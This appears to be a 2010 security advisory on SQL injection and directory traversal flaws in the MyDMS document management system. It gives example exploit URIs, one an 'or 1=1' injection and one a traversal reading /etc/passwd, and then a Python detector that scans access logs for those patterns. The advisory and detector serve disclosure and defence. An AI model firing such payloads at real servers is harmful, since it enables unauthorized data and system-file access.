MyDMS SQL Injection Vulnerability And Directory Traversal Vulnerability

An exploit is not required. An example URI sufficient to exploit the SQL injection vulnerability was provided:

http://www.example.com/demo/out/out.ViewFolder.php?folderid=3 or 1=1

An example for the directory traversal vulnerability:

http://www.example.com/mydms/op/op.ViewOnline.php?request=4:6:/../../../../../etc/passwd
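One way to look for both request patterns in web server access logs, as an added example that is not part of the original advisory or of MyDMS. It assumes Combined Log Format and that a legitimate folderid is a plain integer; the function names are hypothetical and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Assumption: a legitimate folderid is a plain decimal integer, as in "folderid=3".
FOLDER_ID_RE = re.compile(r"\d+")

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so nested encodings compare in one canonical form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(uri):
    """Return the findings for one request URI (empty list means nothing matched)."""
    parts = urlsplit(uri)
    script = parts.path.rsplit("/", 1)[-1]
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if script == "out.ViewFolder.php":
        if any(not FOLDER_ID_RE.fullmatch(decode_fully(v)) for v in params.get("folderid", [])):
            findings.append("non-numeric folderid")
    if script == "op.ViewOnline.php":
        for v in params.get("request", []):
            # Split on path separators and the ':' used in the page's example value.
            if ".." in re.split(r"[/\\:]", decode_fully(v)):
                findings.append("dot-dot segment in request")
    return findings

def scan(log_lines):
    """Return (line_number, findings) for each access-log line that matched."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        found = classify(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits

# Constructed sample lines (documentation addresses, invented timestamps and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /mydms/out/out.ViewFolder.php?folderid=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:02:11 +0000] "GET /demo/out/out.ViewFolder.php?folderid=3%20or%201=1 HTTP/1.1" 200 9876',
    '192.0.2.44 - - [01/Jan/2010:10:02:40 +0000] "GET /mydms/op/op.ViewOnline.php?request=4:6:/../../../../../etc/passwd HTTP/1.1" 200 1432',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, found)
```
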


 

Copyright 2010, SecurityFocus